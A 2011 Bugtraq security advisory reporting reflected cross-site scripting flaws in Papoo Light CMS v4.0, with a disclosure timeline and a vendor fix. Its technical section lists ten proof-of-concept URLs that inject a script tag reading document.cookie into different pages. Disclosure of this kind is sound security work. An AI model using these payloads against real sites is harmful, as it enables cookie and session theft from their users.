Bugtraq mailing list archives

Multiple XSS vulnerabilities in CMS Papoo Light Version


From: sschurtz () t-online de
Date: Mon, 12 Sep 2011 13:35:25 GMT

Advisory:           Multiple XSS vulnerabilities in CMS Papoo Light Version
Advisory ID:        SSCHADV2011-014
Author:             Stefan Schurtz
Affected Software:  v4.0
Vendor URL:         http://www.papoo.de/
Vendor Status:      fixed
CVE-ID:             -

==========================
Vulnerability Description:
==========================

The CMS Papoo Light Version is prone to multiple XSS vulnerabilities

==================
Technical Details:
==================

http://<target>/papoo/papoo_light/index.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/kontakt.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/inhalt.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/forum.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/guestbook.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/account.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/login.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/index/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/forumthread.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/forum/"></a><script>alert(document.cookie);</script>

=========
Solution:
=========

Update to the latest version

====================
Disclosure Timeline:
====================

12-Sep-2011 - informed the developers
12-Sep-2011 - release date of this security advisory
12-Sep-2011 - response and fix by vendor
12-sep-2011 - post on BugTraq

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.papoo.de/
http://www.rul3z.de/advisories/SSCHADV2011-014.txt


Current thread: